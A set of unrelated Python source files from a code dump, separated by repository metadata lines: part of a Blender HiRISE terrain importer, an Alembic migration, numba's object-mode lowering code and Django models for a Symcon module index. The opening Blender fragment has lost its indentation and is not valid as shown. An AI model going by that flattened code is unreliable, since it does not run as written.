ints = list(filter( filter_fun, raw_data[0][base:base+12] +
raw_data[1][base:base+12] +
raw_data[2][base:base+12] +
raw_data[3][base:base+12] +
raw_data[4][base:base+12] +
raw_data[5][base:base+12] +
raw_data[6][base:base+12] +
raw_data[7][base:base+12] +
raw_data[8][base:base+12] +
raw_data[9][base:base+12] +
raw_data[10][base:base+12] +
raw_data[11][base:base+12] ))
len_ints = len( ints )
# If we have all pesky values, return a pesky value
if len_ints == 0:
binned_data.append( self.__ignore_value )
else:
binned_data.append( sum(ints) / len(ints) )
base += 12
return binned_data
def bin12_real_fast(self, raw_data):
""" takes a single value from each 12x12 sample of raw_data and returns a single line of data """
return raw_data[0][11::12]
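    # Illustrative note (not part of the original source): the slice above keeps
    # every 12th sample of the first row starting at index 11, i.e. exactly one
    # representative value per 12x12 block:
    #
    #   >>> list(range(24))[11::12]
    #   [11, 23]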
def cropXY(self, image_iter, XSize=None, YSize=None, XOffset=0, YOffset=0):
""" return a cropped portion of the image """
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
if XSize is None:
XSize = processed_dims[0]
if YSize is None:
YSize = processed_dims[1]
if XSize + XOffset > processed_dims[0]:
XSize = processed_dims[0]
XOffset = 0
if YSize + YOffset > processed_dims[1]:
YSize = processed_dims[1]
YOffset = 0
img_props.processed_dims( (XSize, YSize) )
yield img_props
currentY = 0
for line in image_iter:
if currentY >= YOffset and currentY <= YOffset + YSize:
yield line[XOffset:XOffset+XSize]
# Not much point in reading the rest of the data...
if currentY == YOffset + YSize:
return
currentY += 1
def getImage(self, img, img_props):
""" Assumes 32-bit pixels -- bins image """
dims = img_props.dims()
# setup to unpack more efficiently.
x_len = dims[0]
# little endian (PC_REAL)
unpack_str = "<"
# unpack_str = ">"
unpack_bytes_str = "<"
pack_bytes_str = "="
# 32 bits/sample * samples/line = y_bytes (per line)
x_bytes = 4*x_len
for x in range(0, x_len):
# 32-bit float is "d"
unpack_str += "f"
unpack_bytes_str += "I"
pack_bytes_str += "I"
# Each iterator yields this first ... it is for reference of the next iterator:
yield img_props
for y in range(0, dims[1]):
# pixels is a byte array
pixels = b''
while len(pixels) < x_bytes:
new_pixels = img.read( x_bytes - len(pixels) )
pixels += new_pixels
if len(new_pixels) == 0:
x_bytes = -1
pixels = []
if len(pixels) == x_bytes:
if 0 == 1:
repacked_pixels = b''
for integer in unpack(unpack_bytes_str, pixels):
repacked_pixels += pack("=I", integer)
yield unpack( unpack_str, repacked_pixels )
else:
yield unpack( unpack_str, pixels )
def shiftToOrigin(self, image_iter, image_min_max):
""" takes a generator and shifts the points by the valid minimum
also removes points with value self.__ignore_value and replaces them with None
"""
# use the passed in values ...
valid_min = image_min_max[0]
# pass on dimensions/pixel_scale since we don't modify them here
yield next(image_iter)
# closures rock!
def normalize_fun(point):
if point == self.__ignore_value:
return None
return point - valid_min
for line in image_iter:
yield list(map(normalize_fun, line))
def scaleZ(self, image_iter, scale_factor):
""" scales the mesh values by a factor """
# pass on dimensions since we don't modify them here
yield next(image_iter)
scale_factor = self.scale()
def scale_fun(point):
try:
return point * scale_factor
except:
return None
for line in image_iter:
yield list(map(scale_fun, line))
def genMesh(self, image_iter):
"""Returns a mesh object from an image iterator this has the
value-added feature that a value of "None" is ignored
"""
# Get the output image size given the above transforms
img_props = next(image_iter)
# Let's interpolate the binned DTM with blender -- yay meshes!
coords = []
faces = []
face_count = 0
coord = -1
max_x = img_props.processed_dims()[0]
max_y = img_props.processed_dims()[1]
scale_x = self.scale() * img_props.pixel_scale()[0]
scale_y = self.scale() * img_props.pixel_scale()[1]
line_count = 0
# seed the last line (or previous line) with a line
last_line = next(image_iter)
point_offset = 0
previous_point_offset = 0
# Let's add any initial points that are appropriate
x = 0
point_offset += len( last_line ) - last_line.count(None)
for z in last_line:
if z != None:
coords.append( (x*scale_x, 0.0, z) )
coord += 1
x += 1
# We want to ignore points with a value of "None" but we also need to create vertices
# with an index that we can re-create on the next line. The solution is to remember
# two offsets: the point offset and the previous point offset.
# these offsets represent the point index that blender gets -- not the number of
# points we have read from the image
# if "x" represents points that are "None" valued then conceptually this is how we
# think of point indices:
#
# previous line: offset0 x x +1 +2 +3
# current line: offset1 x +1 +2 +3 x
# once we can map points we can worry about making triangular or square faces to fill
# the space between vertices so that blender is more efficient at managing the final
# structure.
# read each new line and generate coordinates+faces
for dtm_line in image_iter:
# Keep track of where we are in the image
line_count += 1
y_val = line_count*-scale_y
# Just add all points blindly
# TODO: turn this into a map
x = 0
for z in dtm_line:
if z != None:
coords.append( (x*scale_x, y_val, z) )
coord += 1
x += 1
# Calculate faces
for x in range(0, max_x - 1):
vals = [
last_line[ x + 1 ],
last_line[ x ],
dtm_line[ x ],
dtm_line[ x + 1 ],
]
# Two or more values of "None" means we can ignore this block
none_val = vals.count(None)
# Common case: we can create a square face
if none_val == 0:
faces.append( (
previous_point_offset,
previous_point_offset+1,
point_offset+1,
point_offset,
) )
face_count += 1
elif none_val == 1:
# special case: we can implement a triangular face
## NB: blender 2.5 makes a triangular face when the last coord is 0
# TODO: implement a triangular face
pass
if vals[1] != None:
previous_point_offset += 1
if vals[2] != None:
point_offset += 1
# Squeeze the last point offset increment out of the previous line
if last_line[-1] != None:
previous_point_offset += 1
# Squeeze the last point out of the current line
if dtm_line[-1] != None:
point_offset += 1
# remember what we just saw (and forget anything before that)
last_line = dtm_line
me = bpy.data.meshes.new(img_props.name()) # create a new mesh
#from_pydata(self, vertices, edges, faces)
#Make a mesh from a list of vertices/edges/faces
#Until we have a nicer way to make geometry, use this.
#:arg vertices:
# float triplets each representing (X, Y, Z)
# eg: [(0.0, 1.0, 0.5), ...].
#:type vertices: iterable object
#:arg edges:
# int pairs, each pair contains two indices to the
# *vertices* argument. eg: [(1, 2), ...]
#:type edges: iterable object
#:arg faces:
# iterator of faces, each faces contains three or more indices to
# the *vertices* argument. eg: [(5, 6, 8, 9), (1, 2, 3), ...]
#:type faces: iterable object
me.from_pydata(coords, [], faces)
# me.vertices.add(len(coords)/3)
# me.vertices.foreach_set("co", coords)
# me.faces.add(len(faces)/4)
# me.faces.foreach_set("vertices_raw", faces)
me.update()
bin_desc = self.bin_mode()
if bin_desc == 'NONE':
bin_desc = 'No Bin'
ob=bpy.data.objects.new("DTM - %s" % bin_desc, me)
return ob
################################################################################
# Yay, done with importer functions ... let's see the abstraction in action! #
################################################################################
def execute(self):
img = open(self.__filepath, 'rb')
(label, parsedLabel) = self.getPDSLabel(img)
image_dims = self.getLinesAndSamples(parsedLabel)
img_min_max_vals = self.getValidMinMax(parsedLabel)
self.__ignore_value = self.getMissingConstant(parsedLabel)
# MAGIC VALUE? -- need to formalize this to rid ourselves of bad points
img.seek(28)
# Crop off 4 lines
img.seek(4*image_dims[0])
# HiRISE images (and most others?) have 1m x 1m pixels
pixel_scale=(1, 1)
# The image we are importing
image_name = os.path.basename( self.__filepath )
# Set the properties of the image in a manageable object
img_props = image_properties( image_name, image_dims, pixel_scale )
# Get an iterator to iterate over lines
image_iter = self.getImage(img, img_props)
## Wrap the image_iter generator with other generators to modify the dtm on a
## line-by-line basis. This creates a stream of modifications instead of reading
## all of the data at once, processing all of the data (potentially several times)
## and then handing it off to blender
## TODO: find a way to alter projection based on transformations below
if self.__cropXY:
image_iter = self.cropXY(image_iter,
XSize=self.__cropXY[0],
YSize=self.__cropXY[1],
XOffset=self.__cropXY[2],
YOffset=self.__cropXY[3]
)
# Select an appropriate binning mode
## TODO: generalize the binning fn's
bin_mode = self.bin_mode()
bin_mode_funcs = {
'BIN2': self.bin2(image_iter),
'BIN6': self.bin6(image_iter),
'BIN6-FAST': self.bin6(image_iter, 'FAST'),
'BIN12': self.bin12(image_iter),
'BIN12-FAST': self.bin12(image_iter, 'FAST')
}
if bin_mode in bin_mode_funcs.keys():
image_iter = bin_mode_funcs[ bin_mode ]
image_iter = self.shiftToOrigin(image_iter, img_min_max_vals)
        if self.scale() != 1.0:
image_iter = self.scaleZ(image_iter, img_min_max_vals)
# Create a new mesh object and set data from the image iterator
ob_new = self.genMesh(image_iter)
if img:
img.close()
# Add mesh object to the current scene
scene = self.__context.scene
scene.objects.link(ob_new)
scene.update()
# deselect other objects
bpy.ops.object.select_all(action='DESELECT')
# scene.objects.active = ob_new
# Select the new mesh
ob_new.select = True
return ('FINISHED',)
def load(operator, context, filepath, scale, bin_mode, cropVars):
print("Bin Mode: %s" % bin_mode)
print("Scale: %f" % scale)
importer = hirise_dtm_importer(context,filepath)
importer.bin_mode( bin_mode )
importer.scale( scale )
if cropVars:
importer.crop( cropVars[0], cropVars[1], cropVars[2], cropVars[3] )
importer.execute()
print("Loading %s" % filepath)
return {'FINISHED'}
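# Hypothetical invocation sketch (not part of the original add-on): the import
# operator defined elsewhere in this add-on would call ``load`` roughly like
#
#   load(operator, context,
#        filepath="DTEEC_xxxxxx.IMG",   # path assumed for illustration
#        scale=1.0, bin_mode='BIN6', cropVars=False)
#
# where ``operator`` and ``context`` come from Blender's operator machinery.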
| gpl-2.0 | 3,059,977,963,649,307,000 | 32.413745 | 103 | 0.569384 | false | 3.755951 | false | false | false |
ubc/compair | alembic/versions/3f3dd5a97fc7_added_practice_column_to_answers.py | 1 | 1598 | """Added practice column to answers
Revision ID: 3f3dd5a97fc7
Revises: 17b7bd2e218c
Create Date: 2016-08-19 12:55:40.174238
"""
# revision identifiers, used by Alembic.
revision = '3f3dd5a97fc7'
down_revision = '17b7bd2e218c'
from alembic import op
import sqlalchemy as sa
from compair.models import convention
def upgrade():
with op.batch_alter_table('answer', naming_convention=convention) as batch_op:
batch_op.add_column(sa.Column('practice', sa.Boolean(), default=False, server_default='0', nullable=False))
op.create_index(op.f('ix_answer_practice'), 'answer', ['practice'], unique=False)
connection = op.get_bind()
comparison_example_table = sa.table('comparison_example',
sa.Column('answer1_id', sa.Integer),
sa.Column('answer2_id', sa.Integer),
)
answer_table = sa.table('answer',
sa.column('id', sa.Integer),
sa.Column('practice', sa.Boolean)
)
answer_ids = set()
for comparison_example in connection.execute(comparison_example_table.select()):
answer_ids.add(comparison_example.answer1_id)
answer_ids.add(comparison_example.answer2_id)
answer_ids = list(answer_ids)
if len(answer_ids) > 0:
connection.execute(
answer_table.update().where(
answer_table.c.id.in_(answer_ids)
).values(
practice=True
)
)
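# Roughly equivalent SQL for the backfill above (illustrative only; the actual
# statement is generated by SQLAlchemy):
#
#   UPDATE answer SET practice = 1
#    WHERE id IN (SELECT answer1_id FROM comparison_example
#                 UNION SELECT answer2_id FROM comparison_example);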
def downgrade():
with op.batch_alter_table('answer', naming_convention=convention) as batch_op:
batch_op.drop_index('ix_answer_practice')
batch_op.drop_column('practice') | gpl-3.0 | -2,098,296,261,962,190,800 | 29.169811 | 115 | 0.654568 | false | 3.315353 | false | false | false |
pitrou/numba | numba/objmode.py | 3 | 20724 | """
Lowering implementation for object mode.
"""
from __future__ import print_function, division, absolute_import
from llvmlite.llvmpy.core import Type, Constant
import llvmlite.llvmpy.core as lc
from . import cgutils, generators, ir, types, utils
from .errors import ForbiddenConstruct
from .lowering import BaseLower
from .utils import builtins, intern
# Issue #475: locals() is unsupported as calling it naively would give
# out wrong results.
_unsupported_builtins = set([locals])
# Map operators to methods on the PythonAPI class
PYTHON_OPMAP = {
'+': "number_add",
'-': "number_subtract",
'*': "number_multiply",
'/?': "number_divide",
'/': "number_truedivide",
'//': "number_floordivide",
'%': "number_remainder",
'**': "number_power",
'<<': "number_lshift",
'>>': "number_rshift",
'&': "number_and",
'|': "number_or",
'^': "number_xor",
}
class PyLower(BaseLower):
GeneratorLower = generators.PyGeneratorLower
def init(self):
# Strings to be frozen into the Environment object
self._frozen_strings = set()
self._live_vars = set()
def pre_lower(self):
super(PyLower, self).pre_lower()
self.init_pyapi()
def post_lower(self):
pass
def pre_block(self, block):
self.init_vars(block)
def lower_inst(self, inst):
if isinstance(inst, ir.Assign):
value = self.lower_assign(inst)
self.storevar(value, inst.target.name)
elif isinstance(inst, ir.SetItem):
target = self.loadvar(inst.target.name)
index = self.loadvar(inst.index.name)
value = self.loadvar(inst.value.name)
ok = self.pyapi.object_setitem(target, index, value)
self.check_int_status(ok)
elif isinstance(inst, ir.SetAttr):
target = self.loadvar(inst.target.name)
value = self.loadvar(inst.value.name)
ok = self.pyapi.object_setattr(target,
self._freeze_string(inst.attr),
value)
self.check_int_status(ok)
elif isinstance(inst, ir.DelAttr):
target = self.loadvar(inst.target.name)
ok = self.pyapi.object_delattr(target,
self._freeze_string(inst.attr))
self.check_int_status(ok)
elif isinstance(inst, ir.StoreMap):
dct = self.loadvar(inst.dct.name)
key = self.loadvar(inst.key.name)
value = self.loadvar(inst.value.name)
ok = self.pyapi.dict_setitem(dct, key, value)
self.check_int_status(ok)
elif isinstance(inst, ir.Return):
retval = self.loadvar(inst.value.name)
if self.generator_info:
# StopIteration
# We own a reference to the "return value", but we
# don't return it.
self.pyapi.decref(retval)
self.genlower.return_from_generator(self)
return
# No need to incref() as the reference is already owned.
self.call_conv.return_value(self.builder, retval)
elif isinstance(inst, ir.Branch):
cond = self.loadvar(inst.cond.name)
if cond.type == Type.int(1):
istrue = cond
else:
istrue = self.pyapi.object_istrue(cond)
zero = lc.Constant.null(istrue.type)
pred = self.builder.icmp(lc.ICMP_NE, istrue, zero)
tr = self.blkmap[inst.truebr]
fl = self.blkmap[inst.falsebr]
self.builder.cbranch(pred, tr, fl)
elif isinstance(inst, ir.Jump):
target = self.blkmap[inst.target]
self.builder.branch(target)
elif isinstance(inst, ir.Del):
self.delvar(inst.value)
elif isinstance(inst, ir.Raise):
if inst.exception is not None:
exc = self.loadvar(inst.exception.name)
# A reference will be stolen by raise_object() and another
# by return_exception_raised().
self.incref(exc)
else:
exc = None
self.pyapi.raise_object(exc)
self.return_exception_raised()
else:
raise NotImplementedError(type(inst), inst)
def lower_assign(self, inst):
"""
The returned object must have a new reference
"""
value = inst.value
if isinstance(value, (ir.Const, ir.FreeVar)):
return self.lower_const(value.value)
elif isinstance(value, ir.Var):
val = self.loadvar(value.name)
self.incref(val)
return val
elif isinstance(value, ir.Expr):
return self.lower_expr(value)
elif isinstance(value, ir.Global):
return self.lower_global(value.name, value.value)
elif isinstance(value, ir.Yield):
return self.lower_yield(value)
elif isinstance(value, ir.Arg):
value = self.fnargs[value.index]
self.incref(value)
return value
else:
raise NotImplementedError(type(value), value)
def lower_yield(self, inst):
yp = self.generator_info.yield_points[inst.index]
assert yp.inst is inst
self.genlower.init_generator_state(self)
# Save live vars in state
# We also need to save live vars that are del'ed afterwards.
y = generators.LowerYield(self, yp, yp.live_vars | yp.weak_live_vars)
y.lower_yield_suspend()
# Yield to caller
val = self.loadvar(inst.value.name)
# Let caller own the reference
self.pyapi.incref(val)
self.call_conv.return_value(self.builder, val)
# Resumption point
y.lower_yield_resume()
# None is returned by the yield expression
return self.pyapi.make_none()
def lower_binop(self, expr, op, inplace=False):
lhs = self.loadvar(expr.lhs.name)
rhs = self.loadvar(expr.rhs.name)
if op in PYTHON_OPMAP:
fname = PYTHON_OPMAP[op]
fn = getattr(self.pyapi, fname)
res = fn(lhs, rhs, inplace=inplace)
else:
# Assumed to be rich comparison
res = self.pyapi.object_richcompare(lhs, rhs, expr.fn)
self.check_error(res)
return res
def lower_expr(self, expr):
if expr.op == 'binop':
return self.lower_binop(expr, expr.fn, inplace=False)
elif expr.op == 'inplace_binop':
return self.lower_binop(expr, expr.immutable_fn, inplace=True)
elif expr.op == 'unary':
value = self.loadvar(expr.value.name)
if expr.fn == '-':
res = self.pyapi.number_negative(value)
elif expr.fn == '+':
res = self.pyapi.number_positive(value)
elif expr.fn == 'not':
res = self.pyapi.object_not(value)
self.check_int_status(res)
longval = self.builder.zext(res, self.pyapi.long)
res = self.pyapi.bool_from_long(longval)
elif expr.fn == '~':
res = self.pyapi.number_invert(value)
else:
raise NotImplementedError(expr)
self.check_error(res)
return res
elif expr.op == 'call':
argvals = [self.loadvar(a.name) for a in expr.args]
fn = self.loadvar(expr.func.name)
if not expr.kws:
# No keyword
ret = self.pyapi.call_function_objargs(fn, argvals)
else:
# Have Keywords
keyvalues = [(k, self.loadvar(v.name)) for k, v in expr.kws]
args = self.pyapi.tuple_pack(argvals)
kws = self.pyapi.dict_pack(keyvalues)
ret = self.pyapi.call(fn, args, kws)
self.decref(kws)
self.decref(args)
self.check_error(ret)
return ret
elif expr.op == 'getattr':
obj = self.loadvar(expr.value.name)
res = self.pyapi.object_getattr(obj, self._freeze_string(expr.attr))
self.check_error(res)
return res
elif expr.op == 'build_tuple':
items = [self.loadvar(it.name) for it in expr.items]
res = self.pyapi.tuple_pack(items)
self.check_error(res)
return res
elif expr.op == 'build_list':
items = [self.loadvar(it.name) for it in expr.items]
res = self.pyapi.list_pack(items)
self.check_error(res)
return res
elif expr.op == 'build_map':
res = self.pyapi.dict_new(expr.size)
self.check_error(res)
for k, v in expr.items:
key = self.loadvar(k.name)
value = self.loadvar(v.name)
ok = self.pyapi.dict_setitem(res, key, value)
self.check_int_status(ok)
return res
elif expr.op == 'build_set':
items = [self.loadvar(it.name) for it in expr.items]
res = self.pyapi.set_new()
self.check_error(res)
for it in items:
ok = self.pyapi.set_add(res, it)
self.check_int_status(ok)
return res
elif expr.op == 'getiter':
obj = self.loadvar(expr.value.name)
res = self.pyapi.object_getiter(obj)
self.check_error(res)
return res
elif expr.op == 'iternext':
iterobj = self.loadvar(expr.value.name)
item = self.pyapi.iter_next(iterobj)
is_valid = cgutils.is_not_null(self.builder, item)
pair = self.pyapi.tuple_new(2)
with self.builder.if_else(is_valid) as (then, otherwise):
with then:
self.pyapi.tuple_setitem(pair, 0, item)
with otherwise:
self.check_occurred()
# Make the tuple valid by inserting None as dummy
# iteration "result" (it will be ignored).
self.pyapi.tuple_setitem(pair, 0, self.pyapi.make_none())
self.pyapi.tuple_setitem(pair, 1, self.pyapi.bool_from_bool(is_valid))
return pair
elif expr.op == 'pair_first':
pair = self.loadvar(expr.value.name)
first = self.pyapi.tuple_getitem(pair, 0)
self.incref(first)
return first
elif expr.op == 'pair_second':
pair = self.loadvar(expr.value.name)
second = self.pyapi.tuple_getitem(pair, 1)
self.incref(second)
return second
elif expr.op == 'exhaust_iter':
iterobj = self.loadvar(expr.value.name)
tup = self.pyapi.sequence_tuple(iterobj)
self.check_error(tup)
# Check tuple size is as expected
tup_size = self.pyapi.tuple_size(tup)
expected_size = self.context.get_constant(types.intp, expr.count)
has_wrong_size = self.builder.icmp(lc.ICMP_NE,
tup_size, expected_size)
with cgutils.if_unlikely(self.builder, has_wrong_size):
self.return_exception(ValueError)
return tup
elif expr.op == 'getitem':
value = self.loadvar(expr.value.name)
index = self.loadvar(expr.index.name)
res = self.pyapi.object_getitem(value, index)
self.check_error(res)
return res
elif expr.op == 'static_getitem':
value = self.loadvar(expr.value.name)
index = self.context.get_constant(types.intp, expr.index)
indexobj = self.pyapi.long_from_ssize_t(index)
self.check_error(indexobj)
res = self.pyapi.object_getitem(value, indexobj)
self.decref(indexobj)
self.check_error(res)
return res
elif expr.op == 'getslice':
target = self.loadvar(expr.target.name)
start = self.loadvar(expr.start.name)
stop = self.loadvar(expr.stop.name)
slicefn = self.get_builtin_obj("slice")
sliceobj = self.pyapi.call_function_objargs(slicefn, (start, stop))
self.decref(slicefn)
self.check_error(sliceobj)
res = self.pyapi.object_getitem(target, sliceobj)
self.check_error(res)
return res
elif expr.op == 'cast':
val = self.loadvar(expr.value.name)
self.incref(val)
return val
else:
raise NotImplementedError(expr)
def lower_const(self, const):
# All constants are frozen inside the environment
index = self.env_manager.add_const(const)
ret = self.env_manager.read_const(index)
self.check_error(ret)
self.incref(ret)
return ret
def lower_global(self, name, value):
"""
1) Check global scope dictionary.
2) Check __builtins__.
2a) is it a dictionary (for non __main__ module)
2b) is it a module (for __main__ module)
"""
moddict = self.get_module_dict()
obj = self.pyapi.dict_getitem(moddict, self._freeze_string(name))
self.incref(obj) # obj is borrowed
try:
if value in _unsupported_builtins:
raise ForbiddenConstruct("builtins %s() is not supported"
% name, loc=self.loc)
except TypeError:
# `value` is unhashable, ignore
pass
if hasattr(builtins, name):
obj_is_null = self.is_null(obj)
bbelse = self.builder.basic_block
with self.builder.if_then(obj_is_null):
mod = self.pyapi.dict_getitem(moddict,
self._freeze_string("__builtins__"))
builtin = self.builtin_lookup(mod, name)
bbif = self.builder.basic_block
retval = self.builder.phi(self.pyapi.pyobj)
retval.add_incoming(obj, bbelse)
retval.add_incoming(builtin, bbif)
else:
retval = obj
with cgutils.if_unlikely(self.builder, self.is_null(retval)):
self.pyapi.raise_missing_global_error(name)
self.return_exception_raised()
return retval
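    # Rough pure-Python equivalent of the lookup strategy above (illustrative
    # only, not used by the lowering code):
    #
    #   def _lookup_global(glbls, name):
    #       if name in glbls:
    #           return glbls[name]
    #       b = glbls["__builtins__"]   # dict for most modules, module for __main__
    #       ns = b if isinstance(b, dict) else b.__dict__
    #       try:
    #           return ns[name]
    #       except KeyError:
    #           raise NameError(name)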
# -------------------------------------------------------------------------
def get_module_dict(self):
return self.env_body.globals
def get_builtin_obj(self, name):
# XXX The builtins dict could be bound into the environment
moddict = self.get_module_dict()
mod = self.pyapi.dict_getitem(moddict,
self._freeze_string("__builtins__"))
return self.builtin_lookup(mod, name)
def builtin_lookup(self, mod, name):
"""
Args
----
mod:
The __builtins__ dictionary or module, as looked up in
a module's globals.
name: str
The object to lookup
"""
fromdict = self.pyapi.dict_getitem(mod, self._freeze_string(name))
self.incref(fromdict) # fromdict is borrowed
bbifdict = self.builder.basic_block
with cgutils.if_unlikely(self.builder, self.is_null(fromdict)):
# This happen if we are using the __main__ module
frommod = self.pyapi.object_getattr(mod, self._freeze_string(name))
with cgutils.if_unlikely(self.builder, self.is_null(frommod)):
self.pyapi.raise_missing_global_error(name)
self.return_exception_raised()
bbifmod = self.builder.basic_block
builtin = self.builder.phi(self.pyapi.pyobj)
builtin.add_incoming(fromdict, bbifdict)
builtin.add_incoming(frommod, bbifmod)
return builtin
def check_occurred(self):
"""
Return if an exception occurred.
"""
err_occurred = cgutils.is_not_null(self.builder,
self.pyapi.err_occurred())
with cgutils.if_unlikely(self.builder, err_occurred):
self.return_exception_raised()
def check_error(self, obj):
"""
Return if *obj* is NULL.
"""
with cgutils.if_unlikely(self.builder, self.is_null(obj)):
self.return_exception_raised()
return obj
def check_int_status(self, num, ok_value=0):
"""
Raise an exception if *num* is smaller than *ok_value*.
"""
ok = lc.Constant.int(num.type, ok_value)
pred = self.builder.icmp(lc.ICMP_SLT, num, ok)
with cgutils.if_unlikely(self.builder, pred):
self.return_exception_raised()
def is_null(self, obj):
return cgutils.is_null(self.builder, obj)
def return_exception_raised(self):
"""
Return with the currently raised exception.
"""
self.cleanup_vars()
self.call_conv.return_exc(self.builder)
def init_vars(self, block):
"""
Initialize live variables for *block*.
"""
self._live_vars = set(self.interp.get_block_entry_vars(block))
def _getvar(self, name, ltype=None):
if name not in self.varmap:
self.varmap[name] = self.alloca(name, ltype=ltype)
return self.varmap[name]
def loadvar(self, name):
"""
Load the llvm value of the variable named *name*.
"""
# If this raises then the live variables analysis is wrong
assert name in self._live_vars, name
ptr = self.varmap[name]
val = self.builder.load(ptr)
with cgutils.if_unlikely(self.builder, self.is_null(val)):
self.pyapi.raise_missing_name_error(name)
self.return_exception_raised()
return val
def delvar(self, name):
"""
Delete the variable slot with the given name. This will decref
the corresponding Python object.
"""
# If this raises then the live variables analysis is wrong
self._live_vars.remove(name)
ptr = self._getvar(name) # initializes `name` if not already
self.decref(self.builder.load(ptr))
# This is a safety guard against double decref's, but really
# the IR should be correct and have only one Del per variable
# and code path.
self.builder.store(cgutils.get_null_value(ptr.type.pointee), ptr)
def storevar(self, value, name, clobber=False):
"""
        Store an llvm value, allocating a stack slot if necessary.
The llvm value can be of arbitrary type.
"""
is_redefine = name in self._live_vars and not clobber
ptr = self._getvar(name, ltype=value.type)
if is_redefine:
old = self.builder.load(ptr)
else:
self._live_vars.add(name)
assert value.type == ptr.type.pointee, (str(value.type),
str(ptr.type.pointee))
self.builder.store(value, ptr)
# Safe to call decref even on non python object
if is_redefine:
self.decref(old)
def cleanup_vars(self):
"""
Cleanup live variables.
"""
for name in self._live_vars:
ptr = self._getvar(name)
self.decref(self.builder.load(ptr))
def alloca(self, name, ltype=None):
"""
Allocate a stack slot and initialize it to NULL.
The default is to allocate a pyobject pointer.
Use ``ltype`` to override.
"""
if ltype is None:
ltype = self.context.get_value_type(types.pyobject)
with self.builder.goto_block(self.entry_block):
ptr = self.builder.alloca(ltype, name=name)
self.builder.store(cgutils.get_null_value(ltype), ptr)
return ptr
def incref(self, value):
self.pyapi.incref(value)
def decref(self, value):
"""
        This is allowed to be called on a non-pyobject pointer, in which case
no code is inserted.
"""
lpyobj = self.context.get_value_type(types.pyobject)
if value.type.kind == lc.TYPE_POINTER:
if value.type != lpyobj:
pass
else:
self.pyapi.decref(value)
def _freeze_string(self, string):
"""
Freeze a Python string object into the code.
"""
return self.lower_const(string)
| bsd-2-clause | -6,673,226,271,149,968,000 | 35.357895 | 82 | 0.553465 | false | 3.913142 | false | false | false |
lociii/symcon-index | symcon/models.py | 1 | 7636 | # -*- coding: UTF-8 -*-
import markdown
from django.db import models
from django.utils.translation import ugettext_lazy as _
from model_utils.choices import Choices
from symcon import querysets
from symcon.common.util.markdown import MarkDownToHtml
class Repository(models.Model):
user = models.CharField(max_length=100, verbose_name=_('User'))
name = models.CharField(max_length=100, verbose_name=_('Name'))
last_update = models.DateTimeField(null=True, blank=True, verbose_name=_('Last update'))
def get_url(self):
return '{owner_url}/{name}'.format(owner_url=self.get_owner_url(), name=self.name)
def get_issue_url(self):
return '{repo}/issues'.format(repo=self.get_url())
def get_owner_url(self):
return 'https://github.com/{user}'.format(user=self.user)
class Meta:
verbose_name = _('Repository')
verbose_name_plural = _('Repositories')
unique_together = ('user', 'name')
class Branch(models.Model):
repository = models.ForeignKey(to='Repository', verbose_name=_('Repository'))
name = models.CharField(max_length=200, verbose_name=_('Branch'))
last_update = models.DateTimeField(null=True, blank=True, verbose_name=_('Last update'))
default = models.BooleanField(default=False, verbose_name=_('Default'))
def get_raw_url(self):
return self.repository.get_url() + '/raw/' + self.name
class Meta:
verbose_name = _('Branch')
verbose_name_plural = _('Branches')
unique_together = ('repository', 'name')
class Library(models.Model):
objects = querysets.LibraryQuerySet.as_manager()
repository = models.ForeignKey(to='Repository', verbose_name=_('Repository'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
def get_default_librarybranch(self):
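        """Return the library branch belonging to the repository's default
        branch, or None if there is none."""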
for librarybranch in self.librarybranch_set.all():
if librarybranch.branch.default:
return librarybranch
return None
class Meta:
verbose_name = _('Library')
verbose_name_plural = _('Libraries')
unique_together = ('repository', 'uuid')
class LibraryBranch(models.Model):
library = models.ForeignKey(to='Library', verbose_name=_('Library'))
branch = models.ForeignKey(to='Branch', verbose_name=_('Branch'))
name = models.CharField(max_length=200, blank=True, verbose_name=_('Name'))
title = models.TextField(blank=True, verbose_name=_('Title'))
description = models.TextField(blank=True, verbose_name=_('Description'))
req_ips_version = models.CharField(max_length=200, blank=True,
verbose_name=_('Minimum Symcon version'))
author = models.CharField(max_length=200, blank=True, verbose_name=_('Author'))
url = models.URLField(blank=True, verbose_name=_('URL'))
version = models.CharField(max_length=50, blank=True, verbose_name=_('Version'))
build = models.IntegerField(null=True, blank=True, verbose_name=_('Build'))
date = models.IntegerField(null=True, blank=True, verbose_name=_('Date'))
readme_markdown = models.TextField(blank=True, verbose_name=_('Readme MarkDown'))
readme_html = models.TextField(blank=True, verbose_name=_('Readme HTML'))
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.convert_readme()
super().save(force_insert, force_update, using, update_fields)
def convert_readme(self):
self.readme_html = MarkDownToHtml(
text=self.readme_markdown, branch=self.branch).transform()
def get_req_ips_version(self):
if self.req_ips_version:
return self.req_ips_version
return self.branch.name
class Meta:
verbose_name = _('Library branch')
verbose_name_plural = _('Library branches')
unique_together = ('library', 'branch')
ordering = ('-branch__default', 'name')
class LibraryBranchTag(models.Model):
librarybranch = models.ForeignKey(to='LibraryBranch', verbose_name=_('Library branch'))
name = models.CharField(max_length=200, verbose_name=_('Name'))
class Meta:
verbose_name = _('Library branch tag')
verbose_name_plural = _('Library branche tags')
unique_together = ('librarybranch', 'name')
ordering = ('librarybranch', 'name')
class Module(models.Model):
TYPE_CHOICES = Choices(
(0, 'core', _('Core')),
(1, 'io', _('I/O')),
(2, 'splitter', _('Splitter')),
(3, 'device', _('Device')),
(4, 'configurator', _('Configurator')),
)
librarybranch = models.ForeignKey(to='LibraryBranch', verbose_name=_('Library branch'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
name = models.CharField(max_length=200, blank=True, verbose_name=_('Name'))
title = models.TextField(blank=True, verbose_name=_('Title'))
description = models.TextField(blank=True, verbose_name=_('Description'))
type = models.IntegerField(choices=TYPE_CHOICES, null=True, blank=True, verbose_name=_('Type'))
vendor = models.CharField(max_length=200, blank=True, verbose_name=_('Vendor'))
prefix = models.CharField(max_length=200, blank=True, verbose_name=_('Prefix'))
readme_markdown = models.TextField(blank=True, verbose_name=_('Readme MarkDown'))
readme_html = models.TextField(blank=True, verbose_name=_('Readme HTML'))
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.convert_readme()
super().save(force_insert, force_update, using, update_fields)
def convert_readme(self):
self.readme_html = MarkDownToHtml(
text=self.readme_markdown, branch=self.librarybranch.branch).transform()
class Meta:
verbose_name = _('Module')
verbose_name_plural = _('Modules')
unique_together = ('librarybranch', 'uuid')
class ModuleAlias(models.Model):
module = models.ForeignKey(to='Module', verbose_name=_('Module'))
